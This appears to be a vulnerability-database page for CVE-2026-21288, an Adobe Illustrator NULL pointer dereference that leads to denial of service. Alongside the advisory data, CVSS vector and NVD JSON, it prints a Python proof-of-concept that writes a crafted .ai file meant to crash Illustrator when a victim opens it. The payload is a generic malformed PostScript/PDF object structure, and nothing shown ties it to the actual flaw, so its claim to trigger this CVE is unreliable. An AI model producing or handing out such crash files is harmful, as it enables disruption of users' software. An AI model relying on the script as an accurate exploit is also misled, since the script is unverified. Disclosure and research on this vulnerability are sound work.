Security Vulnerability Report
中文
CVE-2026-21288 CVSS 5.5 MEDIUM

CVE-2026-21288

Published: 2026-01-13 19:16:26
Last Modified: 2026-01-14 19:29:14
Source: [email protected]

Description

Illustrator versions 29.8.3, 30.0 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing disruption to services. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:illustrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:adobe:illustrator:30.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Adobe Illustrator <= 30.0
Adobe Illustrator <= 29.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2026-21288 PoC - Adobe Illustrator NULL Pointer Dereference # Generate malicious .ai file to trigger NULL pointer dereference # Usage: python3 cve-2026-21288.py output.ai import struct import sys def create_malicious_ai_file(filename): """ Create a minimal AI file that triggers the NULL pointer dereference in Adobe Illustrator versions 29.8.3, 30.0 and earlier. This PoC exploits insufficient validation in the file parsing routine, causing a NULL pointer dereference when processing crafted file headers. """ # AI file header (PostScript-based format) ai_header = b"""%!PS-Adobe-3.0 %%Creator: Adobe Illustrator(R) 30.0 %%For: (PoC) (CVE-2026-21288) %%Title: (Malicious File) %%CreationDate: (01/01/2026) %%DocumentFonts: (atend) %%BoundingBox: 0 0 612 792 %%EndComments """ # Crafted data section that triggers NULL pointer dereference # The vulnerability occurs when Illustrator processes certain object references # that are not properly initialized during file parsing crafted_section = b"""%%Page: 1 1 %%EndPage: 0 /Trailer << /Size 0 /Root null /Info null >> """ # Malformed object that triggers the vulnerability # NULL pointer is dereferenced when accessing uninitialized object reference exploit_data = b"""0 obj << /Type /Catalog /Pages null /Outlines null /Page null >> endobj 1 0 obj << /Type /Page /Parent null /Resources << /Font << /F0 null >> >> /MediaBox [0 0 612 792] /Contents null /Parent null >> endobj trailer << /Root 0 0 R /Size 1 >> startxref 0 %%EOF """ with open(filename, 'wb') as f: f.write(ai_header) f.write(crafted_section) f.write(exploit_data) print(f"[+] Malicious AI file created: {filename}") print(f"[!] Open this file with Adobe Illustrator to trigger the vulnerability") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 cve-2026-21288.py <output.ai>") sys.exit(1) create_malicious_ai_file(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21288", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:26.173", "lastModified": "2026-01-14T19:29:14.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Illustrator versions 29.8.3, 30.0 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing disruption to services. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}, {"lang": "es", "value": "Las versiones 29.8.3, 30.0 y anteriores de Illustrator se ven afectadas por una vulnerabilidad de desreferencia de puntero nulo que podría provocar una denegación de servicio de la aplicación. Un atacante podría explotar esta vulnerabilidad para bloquear la aplicación, causando interrupción en los servicios. La explotación de este problema requiere interacción del usuario, en el sentido de que una víctima debe abrir un archivo malicioso."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:illustrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "29.0", "versionEndExcluding": "29.8.4", "matchCriteriaId": "51DBEB22-5A04-40DC-BF47-0A6711977FBA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:illustrator:30.0:*:*:*:*:*:*:*", "matchCriteriaId": "7239093D-0266-4AFA-BA6C-94F6593E0B4B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/illustrator/apsb26-03.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.